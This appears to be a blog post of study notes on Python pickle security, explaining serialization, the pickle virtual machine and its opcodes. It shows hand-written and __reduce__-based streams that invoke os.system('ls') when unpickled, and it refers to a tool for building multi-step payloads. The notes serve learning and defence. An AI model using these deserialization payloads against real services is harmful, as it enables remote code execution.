Pickle Notes

A summary of some pickle security topics.

Background

Warning: the pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

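Across different processes or machines, function A can pass an object to function B in several ways: choose a custom protocol, implement a public protocol, or rely on the framework itself to generate a byte stream. The last option is clearly the simplest, and it is exactly what serialization and deserialization provide.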

Key functions: dumps() and loads()
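
As a minimal sketch of these two functions, the round trip below serializes a trusted dictionary to bytes and restores it. The variable names are illustrative only.

```python
import pickle

# An ordinary, trusted object to serialize.
original = {"name": "demo", "values": [1, 2, 3]}

# dumps() turns the object into a byte string.
data = pickle.dumps(original)

# loads() rebuilds an equal, but distinct, object from those bytes.
restored = pickle.loads(data)

print(type(data).__name__)   # bytes
print(restored == original)  # True
print(restored is original)  # False
```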

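Default serialization process:

  • Take the class instance
  • Extract all of its attributes from the object's __dict__
  • Convert the attributes into key-value pairs
  • Write the class name
  • Write the key-value pairs

Deserialization process:

  • Read the pickle stream
  • Rebuild the attribute list
  • Create an object using the stored class name
  • Copy the attributes into the newly created object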
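
The two processes above can be observed on a small object. This is only a sketch: argparse.Namespace is picked here as a convenient standard-library class that keeps its attributes in __dict__ and defines no custom pickling hooks; it is not mentioned in the original notes.

```python
import argparse
import pickle

# argparse.Namespace is used only as a plain class whose instances keep
# their attributes in __dict__ (an assumption of this sketch).
obj = argparse.Namespace(x=1, y=2)

data = pickle.dumps(obj, protocol=0)

# The stream records the module and class name, then the attribute pairs.
print(b"cargparse\nNamespace\n" in data)    # True
print(b"Vx\n" in data and b"Vy\n" in data)  # True

# Loading re-creates an instance of the named class and restores __dict__.
restored = pickle.loads(data)
print(type(restored) is argparse.Namespace)  # True
print(vars(restored))                        # {'x': 1, 'y': 2}
```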

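Pickle relies on a tiny virtual machine. A pickle stream is in effect a program in which instructions and data are interleaved.

The pickle virtual machine (PVM) needs three resources: a processor, a stack, and a memo.

Processor: starting at byte 0, it reads an opcode and its arguments, processes them, updates the stack and the memo, and repeats until the pickle stream ends. It then returns the top of the stack as the deserialized object.

Memo: essentially a set of registers, implemented as a Python dict, that provides storage for the PVM.

Stack: temporary storage for data, arguments, and objects, implemented as a Python list.

PVM instructions: each opcode is 1 byte, and in the text-based protocol 0 its arguments are terminated by a newline (some instructions take no arguments, others take several).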
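
To make the processor, stack, and memo concrete, here is a toy interpreter for a handful of protocol-0 opcodes. It is a simplified sketch rather than the real unpickler: toy_pvm is a hypothetical name, string escapes are ignored, and MARK is modelled as a sentinel on the stack where CPython's pure-Python unpickler swaps stacks via a metastack.

```python
import importlib

def toy_pvm(stream: bytes):
    """Run a tiny subset of protocol-0 opcodes (sketch, not the real unpickler)."""
    stack, memo = [], {}   # the PVM stack (list) and memo (dict)
    mark = object()        # stand-in for the special markobject
    pos = 0                # the "processor" starts reading at byte 0

    def read_line():
        nonlocal pos
        end = stream.index(b"\n", pos)
        line = stream[pos:end].decode("ascii")
        pos = end + 1
        return line

    while True:
        op = stream[pos:pos + 1]   # every opcode is a single byte
        pos += 1
        if op == b"c":             # GLOBAL: two newline-terminated arguments
            module, name = read_line(), read_line()
            stack.append(getattr(importlib.import_module(module), name))
        elif op == b"(":           # MARK
            stack.append(mark)
        elif op == b"S":           # STRING: quoted, newline-terminated
            stack.append(read_line()[1:-1])
        elif op == b"I":           # INT: decimal string argument
            stack.append(int(read_line()))
        elif op == b"t":           # TUPLE: collect the items above the mark
            items = []
            while (top := stack.pop()) is not mark:
                items.append(top)
            stack.append(tuple(reversed(items)))
        elif op == b"R":           # REDUCE: apply callable to the arg tuple
            args = stack.pop()
            func = stack.pop()
            stack.append(func(*args))
        elif op == b"p":           # PUT: store the stack top in the memo
            memo[read_line()] = stack[-1]
        elif op == b"g":           # GET: push a memo entry
            stack.append(memo[read_line()])
        elif op == b".":           # STOP: the stack top is the result
            return stack.pop()
        else:
            raise ValueError(f"unsupported opcode {op!r}")

# Calls the harmless builtins.max(2, 7).
result = toy_pvm(b"cbuiltins\nmax\n(I2\nI7\ntR.")
print(result)  # 7
```

Like the real PVM, this loop will call whatever callable the stream names, which is why untrusted streams must never be loaded.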

Instruction set:

MARK           = b'('   # push special markobject on stack
STOP = b'.' # every pickle ends with STOP
POP = b'0' # discard topmost stack item
POP_MARK = b'1' # discard stack top through topmost markobject
DUP = b'2' # duplicate top stack item
FLOAT = b'F' # push float object; decimal string argument
INT = b'I' # push integer or bool; decimal string argument
BININT = b'J' # push four-byte signed int
BININT1 = b'K' # push 1-byte unsigned int
LONG = b'L' # push long; decimal string argument
BININT2 = b'M' # push 2-byte unsigned int
NONE = b'N' # push None
PERSID = b'P' # push persistent object; id is taken from string arg
BINPERSID = b'Q' # " " " ; " " " " stack
REDUCE = b'R' # apply callable to argtuple, both on stack
STRING = b'S' # push string; NL-terminated string argument
BINSTRING = b'T' # push string; counted binary string argument
SHORT_BINSTRING= b'U' # " " ; " " " " < 256 bytes
UNICODE = b'V' # push Unicode string; raw-unicode-escaped'd argument
BINUNICODE = b'X' # " " " ; counted UTF-8 string argument
APPEND = b'a' # append stack top to list below it
BUILD = b'b' # call __setstate__ or __dict__.update()
GLOBAL = b'c' # push self.find_class(modname, name); 2 string args
DICT = b'd' # build a dict from stack items
EMPTY_DICT = b'}' # push empty dict
APPENDS = b'e' # extend list on stack by topmost stack slice
GET = b'g' # push item from memo on stack; index is string arg
BINGET = b'h' # " " " " " " ; " " 1-byte arg
INST = b'i' # build & push class instance
LONG_BINGET = b'j' # push item from memo on stack; index is 4-byte arg
LIST = b'l' # build list from topmost stack items
EMPTY_LIST = b']' # push empty list
OBJ = b'o' # build & push class instance
PUT = b'p' # store stack top in memo; index is string arg
BINPUT = b'q' # " " " " " ; " " 1-byte arg
LONG_BINPUT = b'r' # " " " " " ; " " 4-byte arg
SETITEM = b's' # add key+value pair to dict
TUPLE = b't' # build tuple from topmost stack items
EMPTY_TUPLE = b')' # push empty tuple
SETITEMS = b'u' # modify dict by adding topmost key+value pairs
BINFLOAT = b'G' # push float; arg is 8-byte float encoding

TRUE = b'I01\n' # not an opcode; see INT docs in pickletools.py
FALSE = b'I00\n' # not an opcode; see INT docs in pickletools.py
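
One way to see these opcodes in an actual stream, without executing it, is the standard pickletools module. The sketch below disassembles a hand-written protocol-0 stream; nothing is loaded, so the callable it names is never invoked.

```python
import pickletools

# A hand-written protocol-0 stream. It is only disassembled here, never loaded.
data = b"cos\nsystem\n(S'ls'\ntR."

# genops() yields (opcode, argument, position) for each instruction.
names = [opcode.name for opcode, arg, pos in pickletools.genops(data)]
print(names)  # ['GLOBAL', 'MARK', 'STRING', 'TUPLE', 'REDUCE', 'STOP']

# dis() prints a human-readable listing of the same stream.
pickletools.dis(data)
```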

Generating pickles

Writing by hand

Basic pattern:

c<module>
<callable>
(<args>
tR

Example:

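cos      # import os
system   # push os.system onto the stack
(S'ls'   # ( saves the current stack (holding os.system) on the metastack and starts an empty one; S pushes 'ls'
tR.      # t pops the current stack's contents into a tuple, restores the saved stack from the metastack, and pushes the tuple; R calls system(*('ls',)); . ends the stream and returns the stack top, i.e. the return value of system('ls')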
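
The same pattern can be tried safely by swapping in a harmless callable. The sketch below is an illustration, not part of the original example: it targets builtins.len in place of os.system, so loading the stream has no side effects.

```python
import pickle

# Same c<module>/<callable>/(<args>/tR pattern, but calling builtins.len
# so that loading the stream is harmless.
payload = b"cbuiltins\nlen\n(S'abc'\ntR."

result = pickle.loads(payload)
print(result)  # 3
```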

Generating with __reduce__

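import os, pickle

class Test(object):
    def __reduce__(self):
        # (callable, args): the unpickler will call os.system('ls')
        return (os.system, ('ls',))

pickle.dumps(Test(), protocol=0)
# b'cnt\nsystem\np0\n(Vls\np1\ntp2\nRp3\n.'
# (this output is from Windows, where os.system lives in the nt module; on POSIX the module name is posix)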

The drawback is that this can only call a single function, so complex operations are hard to construct.
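
A harmless variant makes the mechanism and its limit visible. In this sketch the class name Demo and the choice of len are illustrative assumptions. __reduce__ returns one callable and one argument tuple, so loading the pickle yields the result of that single call instead of a Demo instance.

```python
import pickle

class Demo:
    """Hypothetical class; __reduce__ returns (callable, args)."""

    def __reduce__(self):
        # On load, the unpickler calls len('hello') and uses the return
        # value in place of a Demo instance.
        return (len, ("hello",))

data = pickle.dumps(Demo(), protocol=0)
result = pickle.loads(data)

print(result)                    # 5
print(isinstance(result, Demo))  # False
```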

Automated construction with the AST

Github repo

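It can handle:

  • Variable assignment: the value is stored in the memo, and the memo index is recorded against the variable name
  • Function calls
  • Literals
  • Modifying list and dict members
  • Modifying object attributes

Supported single-line statements:

  • Variable assignment - the left-hand side can be a variable name, a dict or list member, or an object attribute; the right-hand side can be a literal of a basic type or a function call
  • Function call
  • return - can return 0 or 1 values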
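
The general idea can be sketched with the standard ast module. The code below is a hypothetical, much-reduced illustration and not the implementation from the referenced repo: compile_to_pickle is an invented name, only int and simple str literals are supported, calls must have the form module.function(args), and assignment targets must be plain variable names.

```python
import ast
import pickle

def compile_to_pickle(source: str) -> bytes:
    """Translate a tiny Python subset into a protocol-0 pickle (sketch only)."""
    memo = {}   # variable name -> memo index
    out = []    # byte chunks of the generated stream

    def emit(node):
        if isinstance(node, ast.Constant) and type(node.value) is int:
            out.append(b"I%d\n" % node.value)                 # INT
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "\n" in node.value or "\\" in node.value:
                raise ValueError("string escapes are not handled in this sketch")
            out.append(b"V" + node.value.encode("raw-unicode-escape") + b"\n")  # UNICODE
        elif isinstance(node, ast.Name):
            out.append(b"g%d\n" % memo[node.id])              # GET a stored variable
        elif (isinstance(node, ast.Call) and not node.keywords
              and isinstance(node.func, ast.Attribute)
              and isinstance(node.func.value, ast.Name)):
            # module.function(args) -> GLOBAL, MARK, args..., TUPLE, REDUCE
            out.append(f"c{node.func.value.id}\n{node.func.attr}\n(".encode("ascii"))
            for arg in node.args:
                emit(arg)
            out.append(b"tR")
        else:
            raise ValueError(f"unsupported expression: {ast.dump(node)}")

    for stmt in ast.parse(source).body:
        if (isinstance(stmt, ast.Assign) and len(stmt.targets) == 1
                and isinstance(stmt.targets[0], ast.Name)):
            emit(stmt.value)
            index = memo.setdefault(stmt.targets[0].id, len(memo))
            out.append(b"p%d\n0" % index)                     # PUT, then POP
        elif isinstance(stmt, ast.Expr):
            emit(stmt.value)
            out.append(b"0")                                  # POP the unused result
        elif isinstance(stmt, ast.Return):
            if stmt.value is None:
                out.append(b"N")                              # NONE
            else:
                emit(stmt.value)
            out.append(b".")                                  # STOP
            return b"".join(out)
        else:
            raise ValueError(f"unsupported statement: {ast.dump(stmt)}")
    out.append(b"N.")                                         # implicit `return None`
    return b"".join(out)

source = """
n = builtins.len('hello')
return builtins.max(n, 3)
"""
payload = compile_to_pickle(source)
print(payload)
print(pickle.loads(payload))  # 5
```

Storing each assigned value in the memo (PUT) and reading it back with GET is what lets several calls be chained in one stream, which a single __reduce__ tuple cannot express.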

References: PPT, 安全客 (Anquanke), blog, 先知社区 (Xianzhi community)

Author

lll

Published

2020-03-10

Updated

2022-09-19

License